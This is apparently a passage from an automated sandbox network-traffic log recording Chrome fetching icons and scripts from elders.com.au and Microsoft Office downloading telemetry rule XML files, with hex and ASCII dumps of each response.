                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC587INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:45 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"4ca-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 45437
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210077-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730285979.734085,VS0,VS0,VE676
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b00daad1c872-DFW
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC782INData Raw: 34 63 61 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 63 6c 69 70 30 5f 38 34 30 37 5f 31 33 34 37 32 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 2e 35 20 32 32 2e 35 43 38 2e 33 32 38 34 33 20 32 32 2e 35 20 39 20 32 31 2e 38 32 38 34 20 39 20 32 31 43 39 20 32 30 2e 31 37 31 36 20 38 2e 33 32 38 34 33 20 31 39 2e 35 20 37 2e 35 20 31 39 2e 35 43 36 2e 36 37 31 35 37 20 31 39 2e 35 20 36 20 32 30 2e 31 37 31 36 20 36 20 32 31 43 36 20 32 31 2e 38 32 38
                                                                                                                                                                                                            Data Ascii: 4ca<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0_8407_13472)"><path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.828
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC451INData Raw: 20 31 39 2e 39 37 39 36 20 31 33 2e 33 34 31 35 43 32 30 2e 31 31 36 33 20 31 33 2e 32 33 34 38 20 32 30 2e 32 31 31 39 20 31 33 2e 30 38 34 31 20 32 30 2e 32 35 20 31 32 2e 39 31 34 39 4c 32 31 2e 37 35 20 36 2e 31 36 34 39 31 43 32 31 2e 37 37 35 31 20 36 2e 30 35 33 36 33 20 32 31 2e 37 37 34 35 20 35 2e 39 33 38 30 38 20 32 31 2e 37 34 38 33 20 35 2e 38 32 37 30 36 43 32 31 2e 37 32 32 20 35 2e 37 31 36 30 34 20 32 31 2e 36 37 30 38 20 35 2e 36 31 32 34 37 20 32 31 2e 35 39 38 35 20 35 2e 35 32 34 32 34 43 32 31 2e 35 32 36 31 20 35 2e 34 33 36 20 32 31 2e 34 33 34 37 20 35 2e 33 36 35 34 33 20 32 31 2e 33 33 30 39 20 35 2e 33 31 37 39 43 32 31 2e 32 32 37 32 20 35 2e 32 37 30 33 36 20 32 31 2e 31 31 34 20 35 2e 32 34 37 31 31 20 32 31 20 35 2e 32 34
                                                                                                                                                                                                            Data Ascii: 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.2272 5.27036 21.114 5.24711 21 5.24
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            56192.168.2.457728172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC386OUTGET /content/dam/eld/icons---logos/icons/el-logo-2.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:45 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            content-disposition: attachment; filename="el-logo-2.svg"
                                                                                                                                                                                                            last-modified: Tue, 22 Nov 2022 06:53:39 GMT
                                                                                                                                                                                                            etag: W/"ebc-5ee09a1ba22c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-sjc10059-SJC
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730827446.433406,VS0,VS0,VE424
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b00e3af44780-DFW
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC742INData Raw: 65 62 63 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 36 22 20 68 65 69 67 68 74 3d 22 32 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 36 20 32 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 35 2e 31 32 34 31 20 39 2e 33 37 36 37 43 37 33 2e 39 31 30 39 20 39 2e 30 31 38 30 31 20 37 33 2e 31 31 39 37 20 38 2e 39 38 36 33 36 20 37 32 2e 32 30 31 38 20 38 2e 39 39 36 39 31 43 37 31 2e 31 32 35 37 20 39 2e 30 31 38 30 31 20 37 30 2e 32 31 38 34 20 39 2e 32 35 30 31 31 20 36 39 2e 34 38 20 39 2e 36 34 30 34 35 43 36 38 2e 35 35 31 36 20 39 2e 30 37 30 37 36 20 36 37 2e 34 39 36 36 20 38 2e 39 30 31 39 36 20 36 36 2e
                                                                                                                                                                                                            Data Ascii: ebc<svg width="76" height="22" viewBox="0 0 76 22" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M75.1241 9.3767C73.9109 9.01801 73.1197 8.98636 72.2018 8.99691C71.1257 9.01801 70.2184 9.25011 69.48 9.64045C68.5516 9.07076 67.4966 8.90196 66.
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 38 2e 35 33 38 35 20 31 37 2e 32 35 37 34 20 34 38 2e 39 33 39 34 20 31 37 2e 31 39 34 31 43 34 39 2e 31 35 30 34 20 31 37 2e 31 36 32 35 20 34 39 2e 32 39 38 31 20 31 37 2e 31 30 39 37 20 34 39 2e 34 31 34 31 20 31 37 2e 30 37 38 31 43 35 33 2e 30 35 33 38 20 31 35 2e 37 38 30 35 20 35 34 2e 34 30 34 32 20 31 33 2e 37 37 36 20 35 34 2e 38 30 35 31 20 31 33 2e 30 35 38 36 43 35 35 2e 33 34 33 32 20 31 32 2e 31 30 39 31 20 35 35 2e 34 35 39 32 20 31 30 2e 38 33 32 36 20 35 34 2e 35 39 34 31 20 39 2e 38 39 33 36 35 43 35 33 2e 36 36 35 37 20 38 2e 39 30 31 39 36 20 35 30 2e 36 30 36 33 20 38 2e 32 31 36 32 32 20 34 36 2e 39 31 33 38 20 31 30 2e 38 33 32 36 43 34 34 2e 35 36 31 32 20 31 32 2e 34 39 39 35 20 34 32 2e 35 33 35 36 20 31 34 2e 37 36 37 37 20 34
                                                                                                                                                                                                            Data Ascii: 8.5385 17.2574 48.9394 17.1941C49.1504 17.1625 49.2981 17.1097 49.4141 17.0781C53.0538 15.7805 54.4042 13.776 54.8051 13.0586C55.3432 12.1091 55.4592 10.8326 54.5941 9.89365C53.6657 8.90196 50.6063 8.21622 46.9138 10.8326C44.5612 12.4995 42.5356 14.7677 4
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC1369INData Raw: 33 2e 38 35 39 31 33 20 32 35 2e 33 37 31 20 33 2e 34 37 39 33 34 43 32 36 2e 35 31 30 34 20 32 2e 34 34 35 34 36 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 20 32 37 2e 30 34 38 35 20 31 2e 36 34 33 36 37 43 32 37 2e 33 39 36 36 20 31 2e 32 33 32 32 32 20 32 37 2e 31 33 32 39 20 30 2e 35 38 38 36 38 32 20 32 36 2e 34 34 37 31 20 30 2e 34 37 32 36 33 33 43 32 33 2e 35 35 36 35 20 2d 30 2e 30 33 33 37 35 39 34 20 32 31 2e 37 36 33 20 2d 30 2e 30 31 32 36 35 39 38 20 31 39 2e 39 33 37 39 20 30 2e 30 30 38 34 33 39 38 37 43 31 36 2e 34 37 37 35 20 30 2e 30 36 31 31 38 39 31 20 31 32 2e 38 34 38 34 20 31 2e 32 39 35 35 32 20 31 31 2e 30 32 33 32 20 32 2e 38 31 34 37 43 39 2e 31 38 37 35 38 20 34 2e 33 34 34 34 33 20 38 2e 34 33 38 35 33 20 36 2e 38 37 36
                                                                                                                                                                                                            Data Ascii: 3.85913 25.371 3.47934C26.5104 2.44546 27.0485 1.64367 27.0485 1.64367C27.3966 1.23222 27.1329 0.588682 26.4471 0.472633C23.5565 -0.0337594 21.763 -0.0126598 19.9379 0.00843987C16.4775 0.0611891 12.8484 1.29552 11.0232 2.8147C9.18758 4.34443 8.43853 6.876
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC299INData Raw: 34 31 20 37 35 2e 34 34 30 36 20 31 30 2e 30 39 34 31 43 37 35 2e 36 34 31 31 20 39 2e 38 35 31 34 35 20 37 35 2e 34 38 32 38 20 39 2e 35 32 34 34 20 37 35 2e 30 38 31 39 20 39 2e 34 30 38 33 35 4d 33 35 2e 39 36 33 31 20 31 33 2e 38 31 38 32 43 33 30 2e 38 33 35 39 20 31 39 2e 35 30 34 36 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 20 32 39 2e 36 30 31 35 20 31 37 2e 38 35 38 38 43 32 38 2e 32 35 31 32 20 31 36 2e 35 39 32 38 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 20 33 31 2e 32 30 35 31 20 31 33 2e 39 32 33 37 43 33 35 2e 37 30 39 39 20 31 30 2e 31 35 37 34 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 20 33 36 2e 36 36 39 39 20 31 32 2e 30 33 35 33 43 33 37 2e 31 32 33 36 20 31 32 2e 37 39 34 39 20 33 35 2e 39 37 33 36 20 31 33 2e 38 31
                                                                                                                                                                                                            Data Ascii: 41 75.4406 10.0941C75.6411 9.85145 75.4828 9.5244 75.0819 9.40835M35.9631 13.8182C30.8359 19.5046 29.6015 17.8588 29.6015 17.8588C28.2512 16.5928 31.2051 13.9237 31.2051 13.9237C35.7099 10.1574 36.6699 12.0353 36.6699 12.0353C37.1236 12.7949 35.9736 13.81
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            57192.168.2.45772313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 499
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                            x-ms-request-id: 3dd2fc16-001e-0028-2c0b-2fc49f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052946Z-17df447cdb59mt7dhC1DFWqpg4000000027g00000000hgtg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            58192.168.2.45772413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                            x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052946Z-16547b76f7f7scqbhC1DFW0m5w00000005xg00000000rmsw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            59192.168.2.45772513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                            x-ms-request-id: a6359f23-d01e-0014-2f55-2eed58000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052946Z-17df447cdb5g2j9ghC1DFWev0800000002a0000000004x7h
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            60192.168.2.45772613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                            x-ms-request-id: 4785079e-601e-0070-2a8e-2da0c9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052946Z-15869dbbcc6xcpf8hC1DFWxtx000000006d0000000007yxq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            61192.168.2.45772713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:45 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                            x-ms-request-id: b6730b1d-501e-000a-0ada-2f0180000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052946Z-17df447cdb5rrj6shC1DFW6qg4000000028g0000000099t9
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            62192.168.2.457729162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:46 UTC600OUTGET /etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
